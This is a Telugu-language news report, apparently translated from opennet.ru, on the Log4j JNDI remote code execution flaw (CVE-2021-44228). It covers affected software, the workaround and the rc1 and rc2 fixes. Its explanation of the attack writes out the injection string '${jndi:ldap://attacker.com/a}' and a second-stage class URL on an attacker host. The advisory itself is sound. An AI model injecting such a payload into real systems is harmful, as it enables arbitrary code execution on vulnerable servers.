Apache Log4j, Java అప్లికేషన్లలో లాగింగ్ని నిర్వహించడానికి ఒక ప్రముఖ ఫ్రేమ్వర్క్లో, "{jndi:URL}" ఫార్మాట్లో ప్రత్యేకంగా ఫార్మాట్ చేయబడిన విలువ లాగ్కు వ్రాయబడినప్పుడు ఏకపక్ష కోడ్ని అమలు చేయడానికి అనుమతించే ఒక క్లిష్టమైన దుర్బలత్వం గుర్తించబడింది. బాహ్య మూలాల నుండి పొందిన విలువలను లాగ్ చేసే జావా అనువర్తనాలపై దాడి చేయవచ్చు, ఉదాహరణకు, దోష సందేశాలలో సమస్యాత్మక విలువలను ప్రదర్శించేటప్పుడు.
Apache Struts, Apache Solr, Apache Druid లేదా Apache Flink వంటి ఫ్రేమ్వర్క్లను ఉపయోగించే దాదాపు అన్ని ప్రాజెక్ట్లు Steam, Apple iCloud, Minecraft క్లయింట్లు మరియు సర్వర్లతో సహా సమస్య ద్వారా ప్రభావితమవుతాయని గుర్తించబడింది. అపాచీ స్ట్రట్స్ ఫ్రేమ్వర్క్లో క్లిష్టమైన దుర్బలత్వాల చరిత్రను పునరావృతం చేస్తూ, కార్పొరేట్ అప్లికేషన్లపై భారీ దాడులకు ఈ దుర్బలత్వం దారితీస్తుందని అంచనా వేయబడింది, ఇది స్థూల అంచనా ప్రకారం, ఫార్చ్యూన్లో 65% వెబ్ అప్లికేషన్లలో ఉపయోగించబడుతుంది. హాని కలిగించే సిస్టమ్ల కోసం నెట్వర్క్ను స్కాన్ చేసే ప్రయత్నాలతో సహా 100 కంపెనీలు.
వర్కింగ్ ఎక్స్ప్లోయిట్ ఇప్పటికే ప్రచురించబడింది, అయితే స్థిరమైన శాఖల కోసం పరిష్కారాలు ఇంకా సంకలనం చేయబడలేదు అనే వాస్తవం కారణంగా సమస్య మరింత తీవ్రమైంది. CVE ఐడెంటిఫైయర్ ఇంకా కేటాయించబడలేదు. పరిష్కారము log4j-2.15.0-rc1 పరీక్ష శాఖలో మాత్రమే చేర్చబడింది. దుర్బలత్వాన్ని నిరోధించడానికి ప్రత్యామ్నాయంగా, log4j2.formatMsgNoLookups పరామితిని ఒప్పుకు సెట్ చేయాలని సిఫార్సు చేయబడింది.
JNDI (జావా నామకరణం మరియు డైరెక్టరీ ఇంటర్ఫేస్) క్వెరీలను అమలు చేయగల లాగ్కు లైన్ల అవుట్పుట్లో ప్రత్యేక మాస్క్లు “{}”ని ప్రాసెస్ చేయడానికి log4j మద్దతు ఇస్తుంది కాబట్టి సమస్య ఏర్పడింది. దాడి "${jndi:ldap://attacker.com/a}" ప్రత్యామ్నాయంతో స్ట్రింగ్ను పాస్ చేసేలా చేస్తుంది, ఏ log4j జావా క్లాస్కు మార్గం కోసం LDAP అభ్యర్థనను attacker.com సర్వర్కు పంపుతుంది . దాడి చేసేవారి సర్వర్ ద్వారా తిరిగి అందించబడిన మార్గం (ఉదాహరణకు, http://second-stage.attacker.com/Exploit.class) ప్రస్తుత ప్రక్రియ సందర్భంలో లోడ్ చేయబడుతుంది మరియు అమలు చేయబడుతుంది, ఇది దాడి చేసే వ్యక్తిని ఏకపక్ష కోడ్ని అమలు చేయడానికి అనుమతిస్తుంది ప్రస్తుత అప్లికేషన్ యొక్క హక్కులతో సిస్టమ్.
అనుబంధం 1: దుర్బలత్వం ఐడెంటిఫైయర్ CVE-2021-44228 కేటాయించబడింది.
అనుబంధం 2: విడుదల log4j-2.15.0-rc1 ద్వారా జోడించబడిన రక్షణను దాటవేయడానికి ఒక మార్గం గుర్తించబడింది. ఒక కొత్త అప్డేట్, log4j-2.15.0-rc2, దుర్బలత్వం నుండి మరింత పూర్తి రక్షణతో ప్రతిపాదించబడింది. తప్పుగా ఆకృతీకరించబడిన JNDI URLని ఉపయోగించే సందర్భంలో అసాధారణ ముగింపు లేకపోవడంతో అనుబంధించబడిన మార్పును కోడ్ హైలైట్ చేస్తుంది.
మూలం: opennet.ru